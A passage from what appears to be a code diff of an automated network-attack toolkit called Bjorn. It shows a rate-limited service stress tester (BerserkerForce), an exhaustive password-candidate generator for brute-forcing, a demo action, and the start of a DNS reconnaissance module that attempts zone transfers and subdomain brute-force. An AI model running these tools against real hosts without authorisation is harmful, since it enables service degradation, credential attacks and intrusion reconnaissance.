p = int(port) if str(port).strip() else None
if p:
ports.append(p)
except Exception:
pass
# 2) Row data (Ports column, semicolon-separated)
if not ports:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for tok in ports_txt.replace(",", ";").split(";"):
tok = tok.strip().split("/")[0] # handle "80/tcp"
if tok.isdigit():
ports.append(int(tok))
# 3) DB lookup via MAC
if not ports:
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
if mac:
try:
rows = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if rows and rows[0].get("ports"):
for tok in rows[0]["ports"].replace(",", ";").split(";"):
tok = tok.strip().split("/")[0]
if tok.isdigit():
ports.append(int(tok))
except Exception as exc:
logger.debug(f"DB port lookup failed: {exc}")
# De-duplicate, cap at 20 ports (Pi Zero guard)
seen = set()
unique: List[int] = []
for p in ports:
if p not in seen:
seen.add(p)
unique.append(p)
return unique[:20]
def _measure_baseline(self, ip: str, ports: List[int], samples: int = _BASELINE_SAMPLES) -> Dict[int, List[float]]:
"""Phase 1 / 3: TCP connect baseline measurement (always TCP for consistency)."""
baselines: Dict[int, List[float]] = {}
for p in ports:
times: List[float] = []
for _ in range(samples):
if self.shared_data.orchestrator_should_exit:
break
rt = _tcp_connect_time(ip, p)
if rt is not None:
times.append(rt)
time.sleep(0.05) # gentle spacing
baselines[p] = times
return baselines
def _run_stress(
self,
ip: str,
ports: List[int],
mode: str,
duration_s: int,
rate: int,
progress: ProgressTracker,
stress_progress_start: int,
stress_progress_span: int,
) -> Dict[int, Dict[str, Any]]:
"""Phase 2: Controlled stress test with rate limiting."""
rate = max(1, min(rate, _MAX_RATE))
interval = 1.0 / rate
deadline = time.monotonic() + duration_s
# Per-port accumulators
results: Dict[int, Dict[str, Any]] = {}
for p in ports:
results[p] = {"sent": 0, "success": 0, "fail": 0, "times": []}
total_probes_est = rate * duration_s
probes_done = 0
port_idx = 0
while time.monotonic() < deadline:
if self.shared_data.orchestrator_should_exit:
break
p = ports[port_idx % len(ports)]
port_idx += 1
probe_fn = _pick_probe_func(mode, p)
rt = probe_fn(ip, p)
results[p]["sent"] += 1
if rt is not None:
results[p]["success"] += 1
results[p]["times"].append(rt)
else:
results[p]["fail"] += 1
probes_done += 1
# Update progress (map probes_done onto the stress progress range)
if total_probes_est > 0:
frac = min(1.0, probes_done / total_probes_est)
pct = stress_progress_start + int(frac * stress_progress_span)
self.shared_data.bjorn_progress = f"{min(pct, stress_progress_start + stress_progress_span)}%"
# Rate limit
time.sleep(interval)
return results
def _analyze(
self,
pre_baseline: Dict[int, List[float]],
post_baseline: Dict[int, List[float]],
stress_results: Dict[int, Dict[str, Any]],
ports: List[int],
) -> Dict[str, Any]:
"""Phase 4: Build the analysis report dict."""
per_port: List[Dict[str, Any]] = []
for p in ports:
pre = pre_baseline.get(p, [])
post = post_baseline.get(p, [])
sr = stress_results.get(p, {"sent": 0, "success": 0, "fail": 0, "times": []})
pre_mean = _safe_mean(pre)
post_mean = _safe_mean(post)
degradation = _degradation_pct(pre_mean, post_mean)
per_port.append({
"port": p,
"pre_baseline": {
"samples": len(pre),
"mean_s": round(pre_mean, 6),
"stdev_s": round(_safe_stdev(pre), 6),
"values_s": [round(v, 6) for v in pre],
},
"stress": {
"probes_sent": sr["sent"],
"probes_ok": sr["success"],
"probes_fail": sr["fail"],
"mean_rt_s": round(_safe_mean(sr["times"]), 6),
"stdev_rt_s": round(_safe_stdev(sr["times"]), 6),
"min_rt_s": round(min(sr["times"]), 6) if sr["times"] else None,
"max_rt_s": round(max(sr["times"]), 6) if sr["times"] else None,
},
"post_baseline": {
"samples": len(post),
"mean_s": round(post_mean, 6),
"stdev_s": round(_safe_stdev(post), 6),
"values_s": [round(v, 6) for v in post],
},
"degradation_pct": degradation,
})
# Overall summary
total_sent = sum(sr.get("sent", 0) for sr in stress_results.values())
total_ok = sum(sr.get("success", 0) for sr in stress_results.values())
total_fail = sum(sr.get("fail", 0) for sr in stress_results.values())
avg_degradation = (
round(statistics.mean([pp["degradation_pct"] for pp in per_port]), 2)
if per_port else 0.0
)
return {
"summary": {
"ports_tested": len(ports),
"total_probes_sent": total_sent,
"total_probes_ok": total_ok,
"total_probes_fail": total_fail,
"avg_degradation_pct": avg_degradation,
},
"per_port": per_port,
}
def _save_report(self, ip: str, mode: str, duration_s: int, rate: int, analysis: Dict) -> str:
"""Write the JSON report and return the file path."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as exc:
logger.warning(f"Could not create output dir {OUTPUT_DIR}: {exc}")
ts = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H-%M-%S")
safe_ip = ip.replace(":", "_").replace(".", "_")
filename = f"{safe_ip}_{ts}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
report = {
"tool": "berserker_force",
"version": b_version,
"timestamp": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"),
"target": ip,
"config": {
"mode": mode,
"duration_s": duration_s,
"rate_per_s": rate,
"scapy_available": _HAS_SCAPY,
},
"analysis": analysis,
}
try:
with open(filepath, "w") as fh:
json.dump(report, fh, indent=2, default=str)
logger.info(f"Report saved to {filepath}")
except Exception as exc:
logger.error(f"Failed to write report {filepath}: {exc}")
return filepath
# ------------------------------------------------------------------ #
# Orchestrator entry point #
# ------------------------------------------------------------------ #
def execute(self, ip: str, port, row: Dict, status_key: str) -> str:
"""
Main entry point called by the Bjorn orchestrator.
Returns 'success', 'failed', or 'interrupted'.
"""
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# --- Identity cache from row -----------------------------------------
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
# --- Resolve target ports --------------------------------------------
ports = self._resolve_ports(ip, port, row)
if not ports:
logger.warning(f"BerserkerForce: no ports resolved for {ip}")
return "failed"
# --- Read runtime config from shared_data ----------------------------
mode = str(getattr(self.shared_data, "berserker_mode", "tcp") or "tcp").lower()
if mode not in ("tcp", "syn", "http", "mixed"):
mode = "tcp"
duration_s = max(10, min(int(getattr(self.shared_data, "berserker_duration", 30) or 30), 120))
rate = max(1, min(int(getattr(self.shared_data, "berserker_rate", 20) or 20), _MAX_RATE))
# --- EPD / UI updates ------------------------------------------------
self.shared_data.bjorn_orch_status = "berserker_force"
self.shared_data.bjorn_status_text2 = f"{ip} ({len(ports)} ports)"
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports)), "mode": mode}
# Total units for progress: baseline(15) + stress(70) + post-baseline(10) + analysis(5)
self.shared_data.bjorn_progress = "0%"
try:
# ============================================================== #
# Phase 1: Pre-stress baseline (0 - 15%) #
# ============================================================== #
logger.info(f"Phase 1/4: pre-stress baseline for {ip} on {len(ports)} ports")
self.shared_data.comment_params = {"ip": ip, "phase": "baseline"}
self.shared_data.log_milestone(b_class, "BaselineStart", f"Measuring {len(ports)} ports")
pre_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "15%"
# ============================================================== #
# Phase 2: Stress test (15 - 85%) #
# ============================================================== #
logger.info(f"Phase 2/4: stress test ({mode}, {duration_s}s, {rate} req/s)")
self.shared_data.comment_params = {
"ip": ip,
"phase": "stress",
"mode": mode,
"rate": str(rate),
}
self.shared_data.log_milestone(b_class, "StressActive", f"Mode: {mode} | Duration: {duration_s}s")
# Build a dummy ProgressTracker just for internal bookkeeping;
# we do fine-grained progress updates ourselves.
progress = ProgressTracker(self.shared_data, 100)
stress_results = self._run_stress(
ip=ip,
ports=ports,
mode=mode,
duration_s=duration_s,
rate=rate,
progress=progress,
stress_progress_start=15,
stress_progress_span=70,
)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "85%"
# ============================================================== #
# Phase 3: Post-stress baseline (85 - 95%) #
# ============================================================== #
logger.info(f"Phase 3/4: post-stress baseline for {ip}")
self.shared_data.comment_params = {"ip": ip, "phase": "post-baseline"}
self.shared_data.log_milestone(b_class, "RecoveryMeasure", f"Checking {ip} after stress")
post_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "95%"
# ============================================================== #
# Phase 4: Analysis & report (95 - 100%) #
# ============================================================== #
logger.info("Phase 4/4: analyzing results")
self.shared_data.comment_params = {"ip": ip, "phase": "analysis"}
analysis = self._analyze(pre_baseline, post_baseline, stress_results, ports)
report_path = self._save_report(ip, mode, duration_s, rate, analysis)
self.shared_data.bjorn_progress = "100%"
# Final UI update
avg_deg = analysis.get("summary", {}).get("avg_degradation_pct", 0.0)
self.shared_data.log_milestone(b_class, "Complete", f"Avg Degradation: {avg_deg}% | Report: {os.path.basename(report_path)}")
return "success"
except Exception as exc:
logger.error(f"BerserkerForce failed for {ip}: {exc}", exc_info=True)
return "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug / manual) ---------------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="BerserkerForce (service resilience tester)")
parser.add_argument("--ip", required=True, help="Target IP address")
parser.add_argument("--port", default="", help="Specific port (optional; uses row/DB otherwise)")
parser.add_argument("--mode", default="tcp", choices=["tcp", "syn", "http", "mixed"])
parser.add_argument("--duration", type=int, default=30, help="Stress duration in seconds")
parser.add_argument("--rate", type=int, default=20, help="Probes per second (max 50)")
args = parser.parse_args()
sd = SharedData()
# Push CLI args into shared_data so the action reads them
sd.berserker_mode = args.mode
sd.berserker_duration = args.duration
sd.berserker_rate = args.rate
act = BerserkerForce(sd)
row = {
"MAC Address": getattr(sd, "get_raspberry_mac", lambda: "__GLOBAL__")() or "__GLOBAL__",
"Hostname": "",
"Ports": args.port,
}
result = act.execute(args.ip, args.port, row, "berserker_force")
print(f"Result: {result}")

View File

@@ -0,0 +1,114 @@
import itertools
import threading
import time
from typing import Iterable, List, Sequence
def _unique_keep_order(items: Iterable[str]) -> List[str]:
seen = set()
out: List[str] = []
for raw in items:
s = str(raw or "")
if s in seen:
continue
seen.add(s)
out.append(s)
return out
def build_exhaustive_passwords(shared_data, existing_passwords: Sequence[str]) -> List[str]:
"""
Build optional exhaustive password candidates from runtime config.
Returns a bounded list (max_candidates) to stay Pi Zero friendly.
"""
if not bool(getattr(shared_data, "bruteforce_exhaustive_enabled", False)):
return []
min_len = int(getattr(shared_data, "bruteforce_exhaustive_min_length", 1))
max_len = int(getattr(shared_data, "bruteforce_exhaustive_max_length", 4))
max_candidates = int(getattr(shared_data, "bruteforce_exhaustive_max_candidates", 2000))
require_mix = bool(getattr(shared_data, "bruteforce_exhaustive_require_mix", False))
min_len = max(1, min_len)
max_len = max(min_len, min(max_len, 8))
max_candidates = max(0, min(max_candidates, 200000))
if max_candidates == 0:
return []
use_lower = bool(getattr(shared_data, "bruteforce_exhaustive_lowercase", True))
use_upper = bool(getattr(shared_data, "bruteforce_exhaustive_uppercase", True))
use_digits = bool(getattr(shared_data, "bruteforce_exhaustive_digits", True))
use_symbols = bool(getattr(shared_data, "bruteforce_exhaustive_symbols", False))
symbols = str(getattr(shared_data, "bruteforce_exhaustive_symbols_chars", "!@#$%^&*"))
groups: List[str] = []
if use_lower:
groups.append("abcdefghijklmnopqrstuvwxyz")
if use_upper:
groups.append("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
if use_digits:
groups.append("0123456789")
if use_symbols and symbols:
groups.append(symbols)
if not groups:
return []
charset = "".join(groups)
existing = set(str(x) for x in (existing_passwords or []))
generated: List[str] = []
for ln in range(min_len, max_len + 1):
for tup in itertools.product(charset, repeat=ln):
pwd = "".join(tup)
if pwd in existing:
continue
if require_mix and len(groups) > 1:
if not all(any(ch in grp for ch in pwd) for grp in groups):
continue
generated.append(pwd)
if len(generated) >= max_candidates:
return generated
return generated
class ProgressTracker:
"""
Thread-safe progress helper for bruteforce actions.
"""
def __init__(self, shared_data, total_attempts: int):
self.shared_data = shared_data
self.total = max(1, int(total_attempts))
self.attempted = 0
self._lock = threading.Lock()
self._last_emit = 0.0
self.shared_data.bjorn_progress = "0%"
def advance(self, step: int = 1):
now = time.time()
with self._lock:
self.attempted += max(1, int(step))
attempted = self.attempted
total = self.total
if now - self._last_emit < 0.2 and attempted < total:
return
self._last_emit = now
pct = min(100, int((attempted * 100) / total))
self.shared_data.bjorn_progress = f"{pct}%"
def set_complete(self):
self.shared_data.bjorn_progress = "100%"
def clear(self):
self.shared_data.bjorn_progress = ""
def merged_password_plan(shared_data, dictionary_passwords: Sequence[str]) -> tuple[list[str], list[str]]:
"""
Returns (dictionary_passwords, fallback_passwords) with uniqueness preserved.
Fallback list is empty unless exhaustive mode is enabled.
"""
dictionary = _unique_keep_order(dictionary_passwords or [])
fallback = build_exhaustive_passwords(shared_data, dictionary)
return dictionary, _unique_keep_order(fallback)

234
actions/demo_action.py Normal file
View File

@@ -0,0 +1,234 @@
# demo_action.py
# Demonstration Action: wrapped in a DemoAction class
# ---------------------------------------------------------------------------
# Metadata (compatible with sync_actions / Neo launcher)
# ---------------------------------------------------------------------------
b_class = "DemoAction"
b_module = "demo_action"
b_enabled = 1
b_action = "normal" # normal | aggressive | stealth
b_category = "demo"
b_name = "Demo Action"
b_description = "Demonstration action: simply prints the received arguments."
b_author = "Template"
b_version = "0.1.0"
b_icon = "demo_action.png"
b_examples = [
{
"profile": "quick",
"interface": "auto",
"target": "192.168.1.10",
"port": 80,
"protocol": "tcp",
"verbose": True,
"timeout": 30,
"concurrency": 2,
"notes": "Quick HTTP scan"
},
{
"profile": "deep",
"interface": "eth0",
"target": "example.org",
"port": 443,
"protocol": "tcp",
"verbose": False,
"timeout": 120,
"concurrency": 8,
"notes": "Deep TLS profile"
}
]
b_docs_url = "docs/actions/DemoAction.md"
# ---------------------------------------------------------------------------
# UI argument schema
# ---------------------------------------------------------------------------
b_args = {
"profile": {
"type": "select",
"label": "Profile",
"choices": ["quick", "balanced", "deep"],
"default": "balanced",
"help": "Choose a profile: speed vs depth."
},
"interface": {
"type": "select",
"label": "Network Interface",
"choices": [],
"default": "auto",
"help": "'auto' tries to detect the default network interface."
},
"target": {
"type": "text",
"label": "Target (IP/Host)",
"default": "192.168.1.1",
"placeholder": "e.g. 192.168.1.10 or example.org",
"help": "Main target."
},
"port": {
"type": "number",
"label": "Port",
"min": 1,
"max": 65535,
"step": 1,
"default": 80
},
"protocol": {
"type": "select",
"label": "Protocol",
"choices": ["tcp", "udp"],
"default": "tcp"
},
"verbose": {
"type": "checkbox",
"label": "Verbose output",
"default": False
},
"timeout": {
"type": "slider",
"label": "Timeout (seconds)",
"min": 5,
"max": 600,
"step": 5,
"default": 60
},
"concurrency": {
"type": "range",
"label": "Concurrency",
"min": 1,
"max": 32,
"step": 1,
"default": 4,
"help": "Number of parallel tasks (demo only)."
},
"notes": {
"type": "text",
"label": "Notes",
"default": "",
"placeholder": "Free-form comments",
"help": "Free text field to demonstrate a simple string input."
}
}
# ---------------------------------------------------------------------------
# Dynamic detection of interfaces
# ---------------------------------------------------------------------------
import os
try:
import psutil
except Exception:
psutil = None
def _list_net_ifaces() -> list[str]:
names = set()
if psutil:
try:
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
except Exception:
pass
try:
for n in os.listdir("/sys/class/net"):
if n and n != "lo":
names.add(n)
except Exception:
pass
out = ["auto"] + sorted(names)
seen, unique = set(), []
for x in out:
if x not in seen:
unique.append(x)
seen.add(x)
return unique
def compute_dynamic_b_args(base: dict) -> dict:
d = dict(base or {})
if "interface" in d:
d["interface"]["choices"] = _list_net_ifaces() or ["auto", "eth0", "wlan0"]
if d["interface"].get("default") not in d["interface"]["choices"]:
d["interface"]["default"] = "auto"
return d
# ---------------------------------------------------------------------------
# DemoAction class
# ---------------------------------------------------------------------------
import argparse
class DemoAction:
"""Wrapper called by the orchestrator."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.meta = {
"class": b_class,
"module": b_module,
"enabled": b_enabled,
"action": b_action,
"category": b_category,
"name": b_name,
"description": b_description,
"author": b_author,
"version": b_version,
"icon": b_icon,
"examples": b_examples,
"docs_url": b_docs_url,
"args_schema": b_args,
}
def execute(self, ip=None, port=None, row=None, status_key=None):
"""Called by the orchestrator. This demo only prints arguments."""
self.shared_data.bjorn_orch_status = "DemoAction"
self.shared_data.comment_params = {"ip": ip, "port": port}
print("=== DemoAction :: executed ===")
print(f" IP/Target: {ip}:{port}")
print(f" Row: {row}")
print(f" Status key: {status_key}")
print("No real action performed: demonstration only.")
return "success"
def run(self, argv=None):
"""Standalone CLI mode for testing."""
parser = argparse.ArgumentParser(description=b_description)
parser.add_argument("--profile", choices=b_args["profile"]["choices"],
default=b_args["profile"]["default"])
parser.add_argument("--interface", default=b_args["interface"]["default"])
parser.add_argument("--target", default=b_args["target"]["default"])
parser.add_argument("--port", type=int, default=b_args["port"]["default"])
parser.add_argument("--protocol", choices=b_args["protocol"]["choices"],
default=b_args["protocol"]["default"])
parser.add_argument("--verbose", action="store_true",
default=bool(b_args["verbose"]["default"]))
parser.add_argument("--timeout", type=int, default=b_args["timeout"]["default"])
parser.add_argument("--concurrency", type=int, default=b_args["concurrency"]["default"])
parser.add_argument("--notes", default=b_args["notes"]["default"])
args = parser.parse_args(argv)
print("=== DemoAction :: received parameters ===")
for k, v in vars(args).items():
print(f" {k:11}: {v}")
print("\n=== Demo usage of parameters ===")
if args.verbose:
print("[verbose] Verbose mode enabled → simulated detailed logs...")
if args.profile == "quick":
print("Profile: quick → would perform fast operations.")
elif args.profile == "deep":
print("Profile: deep → would perform longer, more thorough operations.")
else:
print("Profile: balanced → compromise between speed and depth.")
print(f"Target: {args.target}:{args.port}/{args.protocol} via {args.interface}")
print(f"Timeout: {args.timeout} sec, Concurrency: {args.concurrency}")
print("No real action performed: demonstration only.")
if __name__ == "__main__":
DemoAction(shared_data=None).run()

837
actions/dns_pillager.py Normal file
View File

@@ -0,0 +1,837 @@
"""
dns_pillager.py - DNS reconnaissance and enumeration action for Bjorn.
Performs comprehensive DNS intelligence gathering on discovered hosts:
- Reverse DNS lookup on target IP
- Full DNS record enumeration (A, AAAA, MX, NS, TXT, CNAME, SOA, SRV, PTR)
- Zone transfer (AXFR) attempts against discovered nameservers
- Subdomain brute-force enumeration with threading
SQL mode:
- Targets provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Discovered hostnames are written back to DB hosts table
- Results saved as JSON in data/output/dns/
- Action status recorded in DB.action_results (via DNSPillager.execute)
"""
import os
import json
import socket
import logging
import threading
import time
import datetime
from typing import Dict, List, Optional, Tuple, Set
from concurrent.futures import ThreadPoolExecutor, as_completed
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="dns_pillager.py", level=logging.DEBUG)
# ---------------------------------------------------------------------------
# Graceful import for dnspython (socket fallback if unavailable)
# ---------------------------------------------------------------------------
_HAS_DNSPYTHON = False
try:
import dns.resolver
import dns.zone
import dns.query
import dns.reversename
import dns.rdatatype
import dns.exception
_HAS_DNSPYTHON = True
logger.info("dnspython library loaded successfully.")
except ImportError:
logger.warning(
"dnspython not installed. DNS operations will use socket fallback "
"(limited functionality). Install with: pip install dnspython"
)
# ---------------------------------------------------------------------------
# Action metadata (AST-friendly, consumed by sync_actions / orchestrator)
# ---------------------------------------------------------------------------
b_class = "DNSPillager"
b_module = "dns_pillager"
b_status = "dns_pillager"
b_port = 53
b_service = '["dns"]'
b_trigger = 'on_any:["on_host_alive","on_new_port:53"]'
b_parent = None
b_action = "normal"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 20
b_cooldown = 7200
b_rate_limit = "5/86400"
b_timeout = 300
b_max_retries = 2
b_stealth_level = 7
b_risk_level = "low"
b_enabled = 1
b_tags = ["dns", "recon", "enumeration"]
b_category = "recon"
b_name = "DNS Pillager"
b_description = (
"Comprehensive DNS reconnaissance and enumeration action. "
"Performs reverse DNS, record enumeration (A/AAAA/MX/NS/TXT/CNAME/SOA/SRV/PTR), "
"zone transfer attempts, and subdomain brute-force discovery. "
"Requires: dnspython (pip install dnspython) for full functionality; "
"falls back to socket-based lookups if unavailable."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "DNSPillager.png"
b_args = {
"threads": {
"type": "number",
"label": "Subdomain Threads",
"min": 1,
"max": 50,
"step": 1,
"default": 10,
"help": "Number of threads for subdomain brute-force enumeration."
},
"wordlist": {
"type": "text",
"label": "Subdomain Wordlist",
"default": "",
"placeholder": "/path/to/wordlist.txt",
"help": "Path to a custom subdomain wordlist file. Leave empty for built-in list (~100 entries)."
},
"timeout": {
"type": "number",
"label": "DNS Query Timeout (s)",
"min": 1,
"max": 30,
"step": 1,
"default": 3,
"help": "Timeout in seconds for individual DNS queries."
},
"enable_axfr": {
"type": "checkbox",
"label": "Attempt Zone Transfer (AXFR)",
"default": True,
"help": "Try AXFR zone transfers against discovered nameservers."
},
"enable_subdomains": {
"type": "checkbox",
"label": "Enable Subdomain Brute-Force",
"default": True,
"help": "Enumerate subdomains using wordlist."
},
}
b_examples = [
{"threads": 10, "wordlist": "", "timeout": 3, "enable_axfr": True, "enable_subdomains": True},
{"threads": 5, "wordlist": "/home/bjorn/wordlists/subdomains.txt", "timeout": 5, "enable_axfr": False, "enable_subdomains": True},
]
b_docs_url = "docs/actions/DNSPillager.md"
# ---------------------------------------------------------------------------
# Data directories
# ---------------------------------------------------------------------------
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "dns")
# ---------------------------------------------------------------------------
# Built-in subdomain wordlist (~100 common entries)
# ---------------------------------------------------------------------------
BUILTIN_SUBDOMAINS = [
"www", "mail", "ftp", "localhost", "webmail", "smtp", "pop", "ns1", "ns2",
"ns3", "ns4", "dns", "dns1", "dns2", "mx", "mx1", "mx2", "imap", "pop3",
"blog", "dev", "staging", "test", "testing", "beta", "alpha", "demo",
"admin", "administrator", "panel", "cpanel", "webmin", "portal",
"api", "api2", "api3", "gateway", "gw", "proxy", "cdn", "media",
"static", "assets", "img", "images", "files", "download", "upload",
"vpn", "remote", "ssh", "rdp", "citrix", "owa", "exchange",
"db", "database", "mysql", "postgres", "sql", "mongodb", "redis", "elastic",
"shop", "store", "app", "apps", "mobile", "m",
"intranet", "extranet", "internal", "external", "private", "public",
"cloud", "aws", "azure", "gcp", "s3", "storage",
"git", "gitlab", "github", "svn", "repo", "ci", "cd", "jenkins", "build",
"monitor", "monitoring", "grafana", "prometheus", "kibana", "nagios", "zabbix",
"log", "logs", "syslog", "elk",
"chat", "slack", "teams", "jira", "confluence", "wiki",
"backup", "backups", "bak", "archive",
"secure", "security", "sso", "auth", "login", "oauth",
"docs", "doc", "help", "support", "kb", "status",
"calendar", "crm", "erp", "hr",
"web", "web1", "web2", "server", "server1", "server2",
"host", "node", "worker", "master",
]
# DNS record types to enumerate
DNS_RECORD_TYPES = ["A", "AAAA", "MX", "NS", "TXT", "CNAME", "SOA", "SRV", "PTR"]
class DNSPillager:
"""
DNS reconnaissance action for the Bjorn orchestrator.
Performs reverse DNS, record enumeration, zone transfer attempts,
and subdomain brute-force discovery.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
# IP -> (MAC, hostname) identity cache from DB
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
# DNS resolver setup (dnspython)
self._resolver = None
if _HAS_DNSPYTHON:
self._resolver = dns.resolver.Resolver()
self._resolver.timeout = 3
self._resolver.lifetime = 5
# Ensure output directory exists
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as e:
logger.error(f"Failed to create output directory {OUTPUT_DIR}: {e}")
# Thread safety
self._lock = threading.Lock()
logger.info("DNSPillager initialized (dnspython=%s)", _HAS_DNSPYTHON)
# --------------------- Identity cache (hosts) ---------------------
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip_addr in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, current_hn)
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def _hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Public API (Orchestrator) ---------------------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""
Execute DNS reconnaissance on the given target.
Args:
ip: Target IP address
port: Target port (typically 53)
row: Row dict from orchestrator (contains MAC, hostname, etc.)
status_key: Status tracking key
Returns:
'success' | 'failed' | 'interrupted'
"""
self.shared_data.bjorn_orch_status = "DNSPillager"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip, "port": str(port), "phase": "init"}
results = {
"target_ip": ip,
"port": str(port),
"timestamp": datetime.datetime.now().isoformat(),
"reverse_dns": None,
"domain": None,
"records": {},
"zone_transfer": {},
"subdomains": [],
"errors": [],
}
try:
# --- Check for early exit ---
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal before start.")
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or self._mac_for_ip(ip) or ""
hostname = (
row.get("Hostname") or row.get("hostname")
or self._hostname_for_ip(ip)
or ""
)
# =========================================================
# Phase 1: Reverse DNS lookup (0% -> 10%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "reverse_dns"}
logger.info(f"[{ip}] Phase 1: Reverse DNS lookup")
reverse_hostname = self._reverse_dns(ip)
if reverse_hostname:
results["reverse_dns"] = reverse_hostname
logger.info(f"[{ip}] Reverse DNS: {reverse_hostname}")
self.shared_data.log_milestone(b_class, "ReverseDNS", f"IP: {ip} -> {reverse_hostname}")
# Update hostname if we found something new
if not hostname or hostname == ip:
hostname = reverse_hostname
else:
logger.info(f"[{ip}] No reverse DNS result.")
self.shared_data.bjorn_progress = "10%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 2: Extract domain and enumerate DNS records (10% -> 35%)
# =========================================================
domain = self._extract_domain(hostname)
results["domain"] = domain
if domain:
self.shared_data.comment_params = {"ip": ip, "phase": "records", "domain": domain}
logger.info(f"[{ip}] Phase 2: DNS record enumeration for {domain}")
self.shared_data.log_milestone(b_class, "EnumerateRecords", f"Domain: {domain}")
record_results = {}
total_types = len(DNS_RECORD_TYPES)
for idx, rtype in enumerate(DNS_RECORD_TYPES):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
records = self._query_records(domain, rtype)
if records:
record_results[rtype] = records
logger.info(f"[{ip}] {rtype} records for {domain}: {records}")
# Progress: 10% -> 35% across record types
pct = 10 + int((idx + 1) / total_types * 25)
self.shared_data.bjorn_progress = f"{pct}%"
results["records"] = record_results
else:
logger.warning(f"[{ip}] No domain could be extracted. Skipping record enumeration.")
self.shared_data.bjorn_progress = "35%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 3: Zone transfer (AXFR) attempt (35% -> 45%)
# =========================================================
self.shared_data.bjorn_progress = "35%"
self.shared_data.comment_params = {"ip": ip, "phase": "zone_transfer", "domain": domain or ip}
if domain and _HAS_DNSPYTHON:
logger.info(f"[{ip}] Phase 3: Zone transfer attempt for {domain}")
nameservers = results["records"].get("NS", [])
# Also try the target IP itself as a nameserver
ns_targets = list(set(nameservers + [ip]))
zone_results = {}
for ns_idx, ns in enumerate(ns_targets):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
axfr_records = self._attempt_zone_transfer(domain, ns)
if axfr_records:
zone_results[ns] = axfr_records
logger.success(f"[{ip}] Zone transfer SUCCESS from {ns}: {len(axfr_records)} records")
self.shared_data.log_milestone(b_class, "AXFRSuccess", f"NS: {ns} | Records: {len(axfr_records)}")
# Progress within 35% -> 45%
if ns_targets:
pct = 35 + int((ns_idx + 1) / len(ns_targets) * 10)
self.shared_data.bjorn_progress = f"{pct}%"
results["zone_transfer"] = zone_results
else:
if not _HAS_DNSPYTHON:
results["errors"].append("Zone transfer skipped: dnspython not available")
elif not domain:
results["errors"].append("Zone transfer skipped: no domain found")
logger.info(f"[{ip}] Skipping zone transfer (dnspython={_HAS_DNSPYTHON}, domain={domain})")
self.shared_data.bjorn_progress = "45%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 4: Subdomain brute-force (45% -> 95%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "subdomains", "domain": domain or ip}
if domain:
logger.info(f"[{ip}] Phase 4: Subdomain brute-force for {domain}")
self.shared_data.log_milestone(b_class, "SubdomainEnum", f"Domain: {domain}")
wordlist = self._load_wordlist()
thread_count = min(10, max(1, len(wordlist)))
discovered = self._enumerate_subdomains(domain, wordlist, thread_count)
results["subdomains"] = discovered
logger.info(f"[{ip}] Subdomain enumeration found {len(discovered)} live subdomains")
else:
logger.info(f"[{ip}] Skipping subdomain enumeration: no domain available")
